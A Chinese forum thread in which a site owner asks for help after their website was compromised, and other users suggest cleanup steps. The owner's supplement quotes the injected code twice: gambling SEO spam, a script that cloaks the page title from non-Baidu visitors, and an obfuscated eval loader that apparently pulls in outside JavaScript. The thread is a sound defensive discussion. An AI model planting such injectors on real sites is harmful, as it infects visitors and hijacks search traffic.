This topic created in 2836 days ago, the information mentioned may be changed or developed.
Supplement 1 · Aug 18, 2018
感谢各位大佬,提供了很多个思路,我慢慢排查看先吧。 目前先换了服务器,可能存在问题的 PHP 就不放上去了。
Supplement 2 · Aug 18, 2018
我服务器是 linux 的
Supplement 3 · Aug 19, 2018
我换了服务器隐藏好 IP 了还是别挂了。被挂马的静态页被加了这样的代码
<meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
<meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
<meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
<meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
 |
1
sabermiao Aug 17, 2018
location.href?
XSS? |
 |
3
Devilker Aug 17, 2018
目测 数据库被加入代码了
只要一更新网站就会再次加上 |
 |
4
helionzzz Aug 17, 2018
先彻查服务器里的 php 文件 之后再改代码什么的
|
 |
5
zarte Aug 17, 2018
管理员权限被人拿了你调权限有啥用。。
|
 |
6
keramist Aug 17, 2018 via Android
需要运维 wx: antcars 可长期 可一次性
|
 |
7
webjin1 Aug 17, 2018
前面套一个 WAF
|
 |
8
zjp Aug 17, 2018 via Android
root: 啥只读
按惯例不应该是重装系统吗 |
 |
9
caola Aug 17, 2018
自己的网站被黑还检查不出什么问题?。。。
|
 |
10
zhenghao110 Aug 17, 2018 via Android
@zjp 😂
|
 |
11
Amcrow Aug 17, 2018 via Android
cron ?
|
 |
12
sorcerer Aug 17, 2018 via Android
网站被放后门了吧
|
 |
13
gamexg Aug 17, 2018
心太大了吧?
被黑第一步排查原因,第二部重做系统。 加只读是什么操作? |
 |
14
DonaidTrump Aug 17, 2018 via iPhone
@helionzzz 为啥网站就一定有 php 文件
|
 |
15
beastk Aug 17, 2018 via iPhone
查日志看下怎么进来的,打补丁,做安全措施。
|
 |
16
luboyan Aug 17, 2018
我也遇到之前两个月,我遇到的是 PHP 的一个文件有后门。wordpress 下载第三方模版时候带来的
|
 |
17
ccc008 Aug 17, 2018
我们公司也遇到过。清理所有 php 后门后还有。后来排查发现远程密码泄露了。233
|
 |
18
JinShu Aug 17, 2018 via Android
先学习什么是后门,现在一般留 2-3 个后门的。 仔细检查下吧
|
 |
19
godgrp Aug 17, 2018 via Android
有可能 dns 劫持,上 https
|
 |
20
mdos Aug 17, 2018
文件先备份,然后重装服务器,密码都改掉,然后排查文件。等文件确认无后门后在传回服务器。
|
 |
21
yanaraika Aug 17, 2018
一定要备份已有代码、格盘、手动检查所有代码、重装服务器
|
 |
22
houyujiangjun Aug 17, 2018
明显是 cdn 劫持,上证书吧 骚年
|
 |
23
MzM2ODkx Aug 17, 2018
像电信搞的鬼
|
 |
24
mytsing520 PRO 1.检查 rewrite ;
2.检查代码; 3.检查数据库 |
 |
25
ztaosony Aug 17, 2018
先检查有没有后门,然后把所有的密码都改一遍
|
 |
26
1nclude Aug 17, 2018
先查杀下 webshell,然后查看下日志,看看是怎么进来的
|
 |
27
toarufan Aug 17, 2018
难道不是 http 劫持了,上 https 吧
|
 |
28
Akkuman Aug 17, 2018 via Android
看起来像是 http 劫持,之前碰到过这种情况,上 https
|
 |
29
feifei8868 Aug 17, 2018  1
换个网络环境看一下,例如 电信有换联通或移动 看一下 如果只有一家服务商或一家的一个地区基本就确定是劫持,如果确定是了 就上 HTTPS 了 如果不是劫持,就"找人"检查程序服务器了
|
 |
30
LvMax Aug 18, 2018 via iPhone
D 盾扫服务器 找有没有 shell 其他的再说 基本上是被写 shell 了
|
 |
31
a516307724 Aug 18, 2018
看起来像是 网络劫持,换个网络环境看看吧
|
 |
32
ddzzhen Aug 18, 2018
full ssl
|
 |
33
abccccabc Aug 18, 2018
楼主,查出来问题了没有?
|
 |
34
VgV Aug 18, 2018
瑟瑟发抖,加个只读这个操作真是可怕。。
ps:楼上说的 http 劫持,能跳到菠菜?那有关部门第一时间就上门查运营商水表。 |
 |
35
hu5ky Aug 18, 2018
什么原因可以自己查日志分析怎么入侵的啊,,你这个什么逻辑????
|
 |
36
uptime Aug 18, 2018
格盘重装也有说的……
|
 |
38
laolinn Aug 18, 2018 via iPhone
首先确认一下 PHP 环境是不是用了那些什么一键搭配来弄的,是的话赶紧换掉。看看日志文件有什么可疑地方,最后就是找时间把网站的漏洞修复一下
|
 |
39
llllllLllll Aug 19, 2018
看一下有没有异常进程
|
 |
40
doufenger OP 我把被串改的代码贴到补充了 哪位大神看看
|
Select Language